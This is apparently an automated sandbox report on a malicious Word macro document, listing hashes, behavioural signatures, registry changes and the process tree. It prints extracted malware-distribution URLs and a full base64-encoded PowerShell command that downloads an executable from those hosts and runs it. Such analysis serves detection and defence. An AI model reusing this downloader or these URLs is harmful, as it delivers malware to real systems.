Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 01:22
Behavioral task
behavioral1
Sample
69456ac63b43e73f2640f74e77e06cde_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
69456ac63b43e73f2640f74e77e06cde_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
69456ac63b43e73f2640f74e77e06cde_JaffaCakes118.doc
-
Size
213KB
-
MD5
69456ac63b43e73f2640f74e77e06cde
-
SHA1
7cce2bfd0f5ef92391c8050e8b81f043052c9a9a
-
SHA256
a405f145ff2577b8895565e687c785ca8394c66d48784d10ab47652d3f48bafc
-
SHA512
0d1c693771c400a8cc1e5498532d13f87b348465e132e0681c3f59676ce36316e8df7ad6f2a932da3a0072dd4e10794de6ae0c976d6a3f4e320790233c1cefc3
-
SSDEEP
3072:u22TWTogk079THcpOu5UZu0/6tJR6R8fo:u/TX07hHcJQetT6RAo
Malware Config
Extracted
https://www.1plus-agency.com/tmp/nlr08Z0/
http://winadev.com/uglot/iiClU/
https://enews.enkj.com/wordpress/h62/
https://apicosto.misco-furniture.com/dvzmj/0xm3yS/
http://drbeatrice.com/wp-content/HSz/
https://ienerpro.com/cgi-bin/VVwhOR/
https://premierbarsamui.com/Irc/O/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2728 2760 powershell.exe -
Blocklisted process makes network request 12 IoCs
Processes:
powershell.exeflow pid process 3 2728 powershell.exe 4 2728 powershell.exe 6 2728 powershell.exe 7 2728 powershell.exe 8 2728 powershell.exe 10 2728 powershell.exe 12 2728 powershell.exe 14 2728 powershell.exe 16 2728 powershell.exe 17 2728 powershell.exe 19 2728 powershell.exe 20 2728 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib\{D5F4E295-62BB-4DE6-8897-4C60518C6E1B}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D5F4E295-62BB-4DE6-8897-4C60518C6E1B}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib\{D5F4E295-62BB-4DE6-8897-4C60518C6E1B}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2116 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2728 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2116 WINWORD.EXE 2116 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2116 wrote to memory of 392 2116 WINWORD.EXE splwow64.exe PID 2116 wrote to memory of 392 2116 WINWORD.EXE splwow64.exe PID 2116 wrote to memory of 392 2116 WINWORD.EXE splwow64.exe PID 2116 wrote to memory of 392 2116 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\69456ac63b43e73f2640f74e77e06cde_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABRAGMAawA4ADIAOAB2AD0AKAAoACcAUgAnACsAJwBoAHgAZAAnACkAKwAnAHMAJwArACcAbwBqACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAUgBQAHIATwBmAGkAbABFAFwAWABCADEAcgBxAE0AbwBcAEMAagAyAHoAMgBqAFAAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAGAAVQBgAFIAaQB0AGAAWQBwAFIAYABPAHQAbwBDAG8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACAAJwArACcAdAAnACkAKwAnAGwAJwArACcAcwAxACcAKwAoACcAMQAnACsAJwAsACAAdABsACcAKwAnAHMAJwApACkAOwAkAE0AbwA2ADAAYwBrAHgAIAA9ACAAKAAnAFQAbAAnACsAJwB5AGwAJwArACcAbgBnACcAKQA7ACQASwB5AHIAMwBsADMANgA9ACgAKAAnAEcAJwArACcAXwBnACcAKwAnAG0AYQBhACcAKQArACcAMgAnACkAOwAkAFQAYgBfADYAdQBzAHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAWAAnACsAJwA5ACcAKwAoACcAQgAnACsAJwBYAGIAMQAnACkAKwAnAHIAcQAnACsAKAAnAG0AbwBYADkAQgBDACcAKwAnAGoAJwApACsAJwAyAHoAJwArACgAJwAyACcAKwAnAGoAcABYADkAQgAnACkAKQAuACIAUgBgAEUAYABwAGwAYQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA4ACsAWwBDAEgAQQBSAF0ANQA3ACsAWwBDAEgAQQBSAF0ANgA2ACkALABbAHMAdAByAGkAbgBHAF0AWwBDAEgAQQBSAF0AOQAyACkAKQArACQATQBvADYAMABjAGsAeAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAWgByAGoANQBpAHoAawA9ACgAKAAnAFIAYQB3ACcAKwAnADAAJwArACcAcAB3ACcAKQArACcAZAAnACkAOwAkAFQAagAzAGEAOQAxADMAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBsAGkAZQBOAHQAOwAkAFoAaAA5AGYAcgBuAG4APQAoACgAJwBoAHQAJwArACcAdABwAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwB3AHcAdwAuACcAKwAnADEAJwApACsAKAAnAHAAJwArACcAbAB1ACcAKQArACcAcwAtACcAKwAoACcAYQBnACcAKwAnAGUAJwApACsAKAAnAG4AJwArACcAYwB5AC4AJwApACsAKAAnAGMAbwBtACcAKwAnAC8AdABtAHAALwBuACcAKwAnAGwAcgAwADgAJwArACcAWgAwAC8AKgBoAHQAdAAnACsAJwBwADoALwAvACcAKQArACgAJwB3AGkAbgBhAGQAZQB2AC4AJwArACcAYwBvAG0AJwArACcALwB1AGcAJwApACsAJwBsAG8AJwArACgAJwB0AC8AaQBpAEMAbAAnACsAJwBVAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwA6AC8AJwApACsAKAAnAC8AZQAnACsAJwBuAGUAJwApACsAJwB3AHMAJwArACcALgBlACcAKwAoACcAbgBrACcAKwAnAGoALgAnACkAKwAoACcAYwBvAG0ALwB3ACcAKwAnAG8AJwArACcAcgBkAHAAcgAnACsAJwBlAHMAcwAvAGgAJwArACcANgAyACcAKwAnAC8AKgBoACcAKQArACgAJwB0AHQAcABzADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwBwAGkAJwArACcAYwAnACsAJwBvACcAKwAoACcAcwAnACsAJwB0AG8ALgBtAGkAcwBjAG8ALQAnACsAJwBmACcAKwAnAHUAJwArACcAcgBuAGkAdAB1AHIAJwArACcAZQAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwBkAHYAegAnACsAJwBtAGoALwAnACsAJwAwAHgAbQAzAHkAUwAvACcAKQArACcAKgAnACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAGQAJwArACcAcgBiACcAKQArACcAZQBhACcAKwAnAHQAcgAnACsAJwBpAGMAJwArACgAJwBlAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AJwArACcAdwBwAC0AYwBvAG4AdAAnACsAJwBlAG4AJwArACcAdAAvAEgAJwApACsAKAAnAFMAegAnACsAJwAvACoAaAB0AHQAcABzADoAJwArACcALwAnACsAJwAvAGkAZQBuACcAKwAnAGUAJwApACsAJwByACcAKwAnAHAAJwArACgAJwByAG8ALgBjACcAKwAnAG8AJwArACcAbQAvAGMAJwApACsAJwBnAGkAJwArACgAJwAtAGIAaQBuAC8AVgAnACsAJwBWACcAKQArACgAJwB3ACcAKwAnAGgATwAnACkAKwAnAFIALwAnACsAJwAqAGgAJwArACcAdAB0ACcAKwAnAHAAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAHAAJwApACsAKAAnAHIAZQAnACsAJwBtACcAKQArACgAJwBpAGUAcgBiACcAKwAnAGEAJwApACsAKAAnAHIAcwAnACsAJwBhACcAKwAnAG0AdQBpAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAJwAvAEkAJwArACcAcgAnACsAJwBjACcAKwAoACcALwBPACcAKwAnAC8AJwApACkALgAiAHMAYABwAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATAAzADcAagBqAGUAawA9ACgAKAAnAFYAJwArACcAaABwAGUAJwApACsAKAAnAGwAJwArACcAYgBpACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBuAG8AdQBuAGMAeAAgAGkAbgAgACQAWgBoADkAZgByAG4AbgApAHsAdAByAHkAewAkAFQAagAzAGEAOQAxADMALgAiAGQATwB3AGAATgBsAG8AQQBgAEQARgBpAEwARQAiACgAJABLAG4AbwB1AG4AYwB4ACwAIAAkAFQAYgBfADYAdQBzAHQAKQA7ACQAWgAwAHkANgBkAG0AYgA9ACgAJwBKAHIAJwArACgAJwBkAGwAJwArACcAZgAnACkAKwAnADcAdgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVABiAF8ANgB1AHMAdAApAC4AIgBsAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADMAMgA0ADYANgApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAJwArACcAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABUAGIAXwA2AHUAcwB0ACkAOwAkAFcANwBpAGYAcwBkADcAPQAoACgAJwBPAGEAJwArACcAYgBrACcAKQArACcAZwAnACsAJwB6AHgAJwApADsAYgByAGUAYQBrADsAJABOADAAcgAwAGkAaABlAD0AKAAoACcARQA3ACcAKwAnADQAJwApACsAKAAnAGEAXwAnACsAJwB1ACcAKQArACcAOQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAaQBxAGcAXwAwAHMAPQAoACcAVQAnACsAKAAnAHoAdQBtACcAKwAnAGEAJwApACsAJwBwAGcAJwApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5d2fb8dffb98f940b17e0602e0ac6a0cf
SHA1e901446765e2eef64bbaf46e590c5283eeebf587
SHA256b08d0c87b326667e7bf11b6da9352fa5c56be2ce1461aa1466a64e199dae749c
SHA512c4303ae02f6f3c9f1a92fdc628e12a2185605a89e0718f6fb7dc1037eb7e8ce519e042acc6ccff22228df5ffbb8f44bf9c8939a825f18bc180d3f4b3526477af